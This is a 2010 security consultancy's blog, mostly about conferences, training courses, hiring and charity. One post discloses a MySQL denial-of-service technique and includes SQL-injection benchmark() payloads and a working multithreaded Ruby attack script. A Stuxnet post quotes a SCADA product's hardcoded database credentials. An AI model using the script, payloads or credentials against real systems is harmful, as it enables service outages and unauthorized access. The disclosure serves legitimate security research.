Tuesday, December 14, 2010

Happy Holidays!

To all our Valued Clients and Friends,

The holiday season is a wonderful time for us to remember the friends and customers who help our business and make our jobs a pleasure all year long. Our business would not be where it is today without your continued and loyal support.

We'd like to take this opportunity to thank you and send our best wishes to you and your families. May your New Year be filled with all the success and happiness that you deserve.

This year has been an extremely busy year for us. Reflecting back on some of the highlights of the year shows us that we have been very fortunate to have spoken and trained at several well respected conferences including Hack in the Box Dubai 2010, IIR in Rosebank and ISSA in Sandton. We were also fortunate enough to have been a sponsor of the ITweb Security Summit 2010.

In terms of giving back to the underprivileged, Telspace Systems got involved in Johnny Long’s Hackers for Charity, Nadia Van Der Merwe (FHM) Charity event in association with Lory Park Zoo and our entire Telspace Systems team helped needy children with the Santa's Shoebox Christmas charity drive – where we provided underprivileged children with the basic necessities and Christmas presents.

From all of us at Telspace Systems, thank you for your loyal support, may you have a safe and restful holiday season.

Friday, November 12, 2010

IIR Conference

The International Institute of Research's (IIR) IT Risk Management Conference was held this week in Rosebank on the 10,11 & 12th November 2010.

Telspace Systems was invited to present their popular "Next Generation BotNet" talk which was very well received. Telspace is honoured for the opportunity to have spoken at the IIR conference and is looking forward to the next IT Risk Management Conference.

The "Next Generation BotNet" is available for download on our site. http://www.telspace.co.za

Telspace will also be running the highly recommended Bluetooth & Wireless Hacking Course at the end of November. For more information or any queries please email [email protected]

Wednesday, November 10, 2010

Bluetooth and Wireless Hacking 101



We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course at the end of November this year!

We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed!

Venue: The FNB Conference Centre – Sandton
Costs: R7490.00 excluding VAT per person
Dates: 25-26th November 2010

Please see course details above or visit our website for more info: http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html

Looking forward to seeing you there!

Thursday, September 30, 2010

MySQL query timeout remote Denial of Service

Tiago Ferreira, a senior security analyst at Telspace Systems, recently stumbled on a vulnerability in Mysql during a Penetration test for a client.

Due to the lack of execution limit time (query timeout) for queries, it is possible to force the MySQL to process a certain query for a determined amount of time (hours/days). The processing time will depend on the hardware resources (cpu, memory) available at the server.

The MySQL has a system variable that defines the maximum amount of connections that can be made simultaneously (max_user_connections) for the daemon. For instance, if this variable is configured to “max_user_connections=100, the MySQL will just allow that 100 simultaneous connections be processed. If a "101" connection is attempted, the daemon will answer with the message *Too many connections*, so that no other requirement be processed while the connections are active.

The benchmark() function can be used to "hold" a determined connection for a certain time interval. For instance:


mysql> select benchmark(500000,sha1('A'));
+------------------------------+
| benchmark(500000,sha1(0x65)) |
+------------------------------+
| 0 |
+------------------------------+
1 row in set (1.11 sec)

When running the benchmark() function, as illustrated, it is possible to verify that the MySQL took about 1.11 seconds to process the query, which means it "held" the connection for a period of 1.11 seconds.

If the value referring to the number of processing times of the benchmark() function is increased, the total processing time will, therefore, increase.

mysql> select benchmark(500000000,sha1(0x65));
+---------------------------------+
| benchmark(500000000,sha1(0x65)) |
+---------------------------------+
| 0 |
+---------------------------------+
1 row in set (12 min 5.06 sec)

The processing of the benchmark() function above took 12 minutes to be executed.

As this function does not have limits for the amount of times necessary to process certain task, it is possible to increase this number to an extremely high value, so that one or more available connections be occupied for a long period of time.

To cause a denial of service, multiple simultaneous connection queries are sent, to fill all the available slots in the MySQL(defined in max_user_connections) and maintain these connections busy with the benchmark() processing. This way the following connections will not be processed by the daemon.

To force the MySQL into processing a query for a lot of hours/days, the following query can be sent:

select benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))

The native function ENCODE() takes about 4 times more to be processed than the sha1() function, and soon was chosen to "hold" the MySQL connections. During the tests made with the daemon, it was noticed that the cpu processing was kept at an average 98%, also denying new connections to the data base. To establish the normal functioning of the daemon it was necessary to restart the MySQL.

The same kind of tests were made in the Microsoft SQL Server 2005, using the function *waitfor delay*, but it didn't appear to be vulnerable because the error message "Query timeout expired" was shown and the connection allowed, which means the MSSQL has a query time checking native algorithm.

The impact caused by the exploration of this vulnerability is more critical when done remotely against Web applications vulnerable to a SQL Injection or Blind SQL Injection.

For instance, an e-commerce site using the MySQL to storage data (products, prices, clients, etc.), can have it's services interrupted. The URL example below is responsible for seeking at the data base the product identified by the parameter id=100 and show them to the user.

http://e-commerce.example.com/products.php?cat=2&id=100

An attack scene for denial of service would be to send the following query several times.

http://e-commerce.example.com/products.php?cat=2&id=100+select+benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))%23%23

As a proof of concept a ruby script was developed to exploit this vulnerability, in the case of a Web application is vulnerable to SQL injection.

#!/usr/bin/ruby
#Telspace Systems - www.telspace.co.za - info[@]telspace.co.za

require 'net/http'
require 'uri'
require 'optparse'

# Command line options

options = {}
OptionParser.new do |opts|

options[:url] = nil
opts.on('-u', '--url',"Specify an URL vulnerable for MySQL Injection\n\n") do
options[:url] = ARGV[0]
end

end.parse!

# HTTP config

if options[:url] != nil
$base_url = options[:url].match(/http:\/\/(.*)\//).to_s
$vuln_param = options[:url].scan(/\/\/[^\/]*(.*)/).to_s

else
puts "\tUse -u or --url to specify an URL vulnerable to MySQL Injection\n\n"
exit

end

# Attack config

threads = 500
$payload1 = "+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"
$payload2 = "'+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"

# HTTP interface
def build_http_request()
begin
uri = URI.parse($base_url)
request = Net::HTTP.new(uri.host,uri.port)
rescue Exception => error2
store_logs = error2.inspect
return request
end
end

# Send multiples requests

1.upto(threads){|i|
threads = Thread.new do
puts "Send request " + i.to_s
request = build_http_request()
request.request_get($vuln_param+$payload1)
request.request_get($vuln_param+$payload2)
end
}

Wednesday, September 8, 2010

IIR Conference 2010

Telspace Systems have been invited to present their 'Next Generation Botnets' talk at The Institute for International Research's (IIR) IT Risk Management Conference on 10th October 2010 at the IIR Conference Center in Rosebank, South Africa.

IIR’s IT Risk Management Conference will explore the challenges and current risks facing the IT Professional in the South African market and provide up-to-date techniques and experiences in assessing and averting risk. The expert speakers featured at this event come from a variety of sectors and are industry leaders in their respective fields, providing you with specialist and practical advice.”

Some of the other presentations that we are looking forward to includes:

· Cloud Computing and its impact on IT Risk Management.

· An investigation into the use of social networking sites by employees and the effects on your IT Security.

· How to secure your organisation in the event of disaster.

· The security and risk implications of importing software.

· Implementing an IT Risk Management policy to safe guard against internal risks.


Telspace Systems is also pleased to announce the launch of their new & updated website
http://www.telspace.co.za

Friday, August 6, 2010

ISSA 2010

It’s been a while since I last posted on the blog; this is thankfully due to how busy we have been on this side.

This week Telspace Systems presented at the prestigious ISSA 2010 conference held at the Sandton Convention Centre in Johannesburg, South Africa.

Telspace Systems presented on Next Generation Botnets, Our talk should be available soon for download via their website at www.infosecsa.co.za . The talk was very well received and we have been invited to present at a few other universities in South Africa later this year. I can also highly recommend attending net year’s ISSA conference due to the level of expertise of the talks as well as the general atmosphere.

Amongst the list of headline speakers was Craig Rosewarne. Craig presented a great talk on the trends of information security and whats in store for us in the future in South Africa. His talk took a broad view at South African history and compared it with information security as a whole. This is definitely a talk worth reviewing and I do recommend a revision of his slides.

We have a lot of news coming up at Telspace Systems so I’ll definitely try updating you as much as possible in between the huge projects that we have at the moment.

Be safe and keep well.

Wednesday, July 21, 2010

Just a few notes about a new 0-day vulnerability for our clients...

After the notorious Adobe Flash 0-day that put the security community on alert at the end of May, it is now time for a new vulnerability to steal the thunder. A few days ago Microsoft has released a security advisory (2286198) warning his costumers about a critical security flaw. As detailed on the advisory, all maintained version of Windows Operating System are affected by the issue. Other areas confirm that other non-maintained versions of the operating system like Windows 2000 SP4 and Windows XP SP2 are still affected.

This vulnerability, cataloged as CVE-2010-2568, lies on the Windows Shell component and occurs due the incorrectly way Windows parses shortcut references (files containing the .lnk extension). The advisory also details that it is possible to take advantage of this flaw in a malicious way to allow remote code execution.

As reported on June 16th by the MPCC (Microsoft Malware Protection Center), a worm called Stuxnet that takes advantage of this vulnerability was already being monitored and is suspected to be spreading in the wild for at least a month, possibly longer. According to them, USB removable devices are the main instrument used in order to propagate it, but other infection mechanisms could also be used as Windows file shares and WebDav.

According to Chester Wisniewski, the flaw occurs when shell32.dll tries to load control panel icons from applets. It is possible to create a specially crafted shortcut that points to a malicious file. That way, when the folder gets displayed (using Windows explorer for example) the LNK file will be charged to load and execute the malicious payload. Notice that the .lnk file just carries the exploitation/infection vector that leads the drivers to be executed.

As pointed out by Chet on the same SophosLabs blog post, the analysis performed against an infected USB device containing the malicious code shows that the crafted shortcut file loads two drivers: mrxcls.sys and mrxnet.sys.

These two drivers basically consist of a rootkit and once executed it installs a backdoor on the system, hides the presence of malicious files on the removable USB device and injects encrypted data blobs that seems to serve to the basic rootkit infrastructure.

What has raised special attention is that these drivers were signed using a private key that belongs to Realtek Semiconductor Corp. a well known IC design and peripheral manufacturer company. This characteristic let the drivers to run unnoticed, without causing any warning to be exhibited to the user. How the attacker(s) manage to get their drivers signed by Realtek is still unknown.

The MMPC teams have worked together with VeriSign and Realtek to revoke the certificate and issue a new one. Although, according F-secure it is still possible to use the certificate due the countersignature method of time stamping that allows signatures to be verified even after the certificate has expired or been revoked.

Looking at the malware behavior, Frank Boldewin found some database queries that target the Siemens SIMATIC WinCC SCADA system, a computer system used to control and monitor critical infrastructure operations such the ones performed in power plants and large communication systems. According the Slashdot post the product uses a hardcoded username and password to access its database system (Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder).

When you don't work for a company that operates critical infrastructure services you should not be worried about the malware it in the first place. But since a proof of concept code was released on exploit-db.com on June 18th, we can expect more payloads to emerge and ends up being triggered by the LNK vulnerability.

Another important thing to mention is that a lot of questions are raised up these days concerning AutoRun and AutoPlay. As described on Seans post at F-Secure Weblog, the vulnerability could be exploited even if AutoRun and AutoPlay are disabled. However, as happened with the Conficker, these features could be used to trick a user and get the code executed, but it is definitely not required. In order to get the payload executed it is just necessary to display the folder content with the crafted LNK file inner in.

In order to mitigate the issue until Microsoft properly releases a patch some workarounds were proposed as disabling the displaying of icons for shortcuts and disabling WebClient service, more details about how to perform such operations could be checked on the Microsoft Advisory (2286198). Other solution as proposed on the SophosLabs blog post involves the deploy of a GPO (Group Policy Object) disallowing the use of executable files that are not on the C: drive which I believe is the best way to mitigate the problem until the patch is released.

More information about this malware could be verified on the Chet post including a video demonstrating the attack and in the PDF document wrote by Kupreev Oleg and Ulasen Sergey from VirusBlokAda, a Belorussian based company who first discovered and analyzed the exploit.

Friday, May 28, 2010

Hello world!

Hi, my name is Gustavo and I have joined the Telspace Systems crew as a senior security analyst at the beginning of May.

Now you should probably be asking yourself.. Who the hell is Gustavo? Who cares about him anyway =]

Well, one of my first activities here at Telspace requires me to write a blog post introducing myself. I am definitely not good with blog words, but I will try to make things painless and quick for everyone who is interested.

I am from Brazil... hope this fact waivers a presentation about being a soccer fanatic (in a good way) and my expectations regarding 2010 world cup hehe. As i was saying, I am directly involved in computer security for 10 years now. I have spent the last 4 years working for a market-leading security company here in Brazil performing penetration tests and security assessments for brazilian government and other high profile customers. Furthermore, I am very happy to have joined the Telspace crew and I am very excited about my work here. I will also be in charge of heading up expansion in Brazil, adding to all of Telspace Systems Brazilian clients.

Feel free to contact me to share and discuss computer related stuff, or just to chat about any subject of mutual interest =]

By the way, my new, fancy mail is: gustavo *DO_NOT_SPAM_ME* telspace dot co dot za

Wednesday, May 19, 2010

Welcome Gustavo...

It was great to catch up with many friends and collegues at this years ITWeb Security Summit in Johannesburg. As one of the sponsors of the Security Summit, I trust that you enjoyed the 2 day conference and gained some value out of it. I look forward to some of your feedback and comments regarding it.

Telspace Systems has had some busy and exciting months this year. Our Web Application Assessment and Attack and Penetration testing side has grown in leaps and bounds. Due to this, we have hired 2 more staff to come on board our team. It's important to keep you up to speed with what's happening here, since we are experiencing a rather large amount of change and growth recently.

Gustavo Pimentel Bittencourt has been hired as one of our new senior security analysts. Gustavo will be assisting our clients in providing very high level, web application assessments and infrastructure penetration testing. Gustavo was a scholarship holder of CNPq (Brazilian National Council for Scientific and Technologic Development) working as intern researcher at C.E.S.A.R. (Center for Studies of Advanced Systems of Recife), a well-known research and software development center in Brazil. Gustavo has presented at many international conferences and has also provided training worldwide at various international conferences. Since joining our team in April 2010, Gustavo has completed a number of high level assessments for our clients.

We're always looking for exceptional talent, if you feel you have what it takes please send us an email with your CV.

Telspace Systems will also be running Web Application Hacking 101, one of our most popular courses during July 2010. If you're interested in attending, please contact us.

Wednesday, May 5, 2010

HITB and more...



Telspace Systems had a successful visit to Hack in the Box 2010 (HITB) Dubai, despite the ash cloud putting a bit of damper on the number of attendees :) . The HITB guys didn’t let it get in the way of presentations, though, as they set it up so that the speakers’ could do talks remotely(and completely legally in terms of UAE specs). Very clever I must say!

Andries was great in his contribution to the Wireless and Bluetooth Hacking 101 training session and we received great feedback from our attendees about the course. In terms of the other talks at the actual conference, they were definitely of international standard and a great refresher at many of the critical issues which still seem to be very prominent in our industry.

Andries and I both agreed that Mr Shah’s talk on Web Application Hacking was the most interesting, as it is a space which we are very active in. Mauriano’s SAP vulnerabilities talk and his discussion around SAP’s testing framework (bizsploit) was also very informative. In terms of our talk, it was extremely well received by the audience and we have had very positive feedback. You can download our slides from here or from the hitb website directly.

We met up with a lot of old friends and the networking opportunities were great(watch this space in the future) – we look forward to seeing many of our peers at HITB Amsterdam(Hopefully) later this year.

Back on home-ground, last week (28th April 2010) we presented at the Information Security Group of Africa (ISGA) HITB feedback session. It was great to share some of our Dubai experiences with the local guys. You can download our feedback presentation at http://www.telspace.co.za/isgfeedback.pdf .

Coming up, we have the Security Summit to look forward to next week. Telspace Systems has a corporate sponsorship at the event, and we’ll be there to chat, mingle and network. Mr Shah will be there too, so you must all go and check his talk out. What he says is very relevant locally and internationally.

Have a great week everyone. Keep checking out our blog, more exciting news coming soon....

Monday, March 29, 2010

Telspace sponsors beauty and the beasts

Bet you’re thinking... wtf? Well, good, coz we need your full attention. Telspace is doing something a little different in terms of ‘giving back’ this year, and you can help us, so listen up...

Animals have always been close to my heart and I’ve been looking for a while now for worthwhile project where I can feel we are truly making a difference in some of their lives.

Nadia van der Merwe, one of FHM’s shortlisted 100 Sexiest Women, is running a campaign for animal charity and came to us as a sponsor. Well, how we could refuse?

She’s calling it Nadia VDM’s Proudly South African 100 Sexiest Campaign. The way it works is the more votes she gets, the more money that will be donated to charity – Lory Park Zoo, in this case.

Last year, Nadia was voted 16 out of the 100 sexiest women in the world. This year, for every position she climbs in that ranking, Telspace System will donate R1000 to the zoo.

So how did this campaign come about? According to Nadia she wanted something more ‘proudly South African’ to represent her FHM photoshoot this year, especially with all the current focus on the World Cup. After targeting the Big 5 as her theme, Nadia did her ‘shoot incorporating the animals.

So guys, please – go to the FHM website(www.fhm.co.za) and vote for Nadia van der Merwe. If helping out animals is not your thing, its worth it just to go see some of her incredible photos online.

P.S.

Telspace Systems has sponsored a party for Nadia van der Merwe at Latinova in Rosebank, JHB this coming Saturday evening. This includes a fashion show with Nadia - Sporting our leet Telspace Systems gear. Be there!

Thursday, March 18, 2010

See you at HITBSecConf2010!

We’re excited to not only be presenting, but training at this year’s Hack in the Box conference, which takes place in Dubai from 19-22 April. Our talk will be focused on next generation botnets, and what kind of power they give to botmasters. Furthermore, we’ll be demonstrating how DNS is used to evade CNC control take down, and explore the recent iPhone botnet and the malicious worms that followed its discovery.

We will also be doing our popular Wireless & Bluetooth Hacking 101 course, which most of you have probably already heard of. It will be Telspace security analyst Andries Burger’s virgin trip to Hack in the Box – and his first time helping us with the training. We are all pretty eager to see how he takes it all...

If you can’t make it out to Dubai this year, don’t be too bleak – we’re going to be doing some cool things right here in sunny SA in April as well.

First off, we’ll be presenting our feedback talk at the Information Security Group of Africa’s HITB feedback session at the end of April.

And for those of you who have not yet been to one of our Wireless & Bluetooth Hacking 101 courses, you’ll have a chance to on 11-12 April when we will be offering training in Sandton.

Thank you all again for your continued support – it is your interest that allows us to participate in high-profile events such as Hack in the Box in the first place. Hope to see you all there!

Thursday, February 18, 2010

Telspace is hiring (again...)

The past few months have been rather chaotic at Telspace Systems. Therefore, its time (once again) for us to look at hiring a few more security analysts for our unique Telspace team.

We're looking for extremely skilled security analysts (especially on the web application hacking side) who are passionate about information security, enjoy intense challenges, can work in an informal environment and have quite flexible time in their daily lifestyles. A major plus would be having some sort of Foosball skills.

If you think you have what it takes or that you might know of someone who makes the cut, please forward details on to us as soon as possible so that we can meet up and chat.

Take care,

Friday, February 12, 2010

Google buzz privacy flaw.

By now you have probably heard about Google Buzz. A new social networking service brought out by Google, allowing users to share updates, photos and by the looks of it your entire contact list and anyone you have emailed. It also encompasses factors from the well known Twitter and Facebook. With all new services, security factors are an issue and Google buzz is no different. A rather serious privacy flaw lies in it, exposing all your contact addresses and people you have emailed.

Once in google buzz you have a prompt with the following "You're already set up to follow the people you email and chat with." So by simply emailing someone you will now be "following" them and they will have access to you contact list.

One of the main issues being discussed about Google buzz is the automatic opt-in, in a sense forcing users into using the service. Then publicly disclosing your email and contact list, leaving your email open to spammers. All and all a bad move from Google. They seem to be taking a quick and serious response to the issues, with a couple fixes being brought out already.

However in the mean time google is asking for feedback, and you can give yours here: http://mail.google.com/support/bin/request.py?contact_type=buzz

In other news our submission wasn't accepted for the local security summit, yet the talk has been internationally accepted. We can understand and wouldn't want to side track the vendor talks and actually get some technical talks in there anyway. ;)

UPDATE: Well, Google has listened to everyones feedback and already fixed a number of the issues. For more info please read here.

Tuesday, February 2, 2010

Another post... finally.

Hi all, First off apologies for the rather dormant blog lately. Things have again gotten pretty chaotic on our side. The good kind of chaos though. We however are going to keep more posts coming your way.

For the year ahead we have already got a couple trips to Dubai and possibly Amsterdam planned. Although Dino might make me sign a few more NDAs before we head there. We also have a number of projects lined up which we will do our best to keep everyone up to date on. We wish you all the best for the year ahead.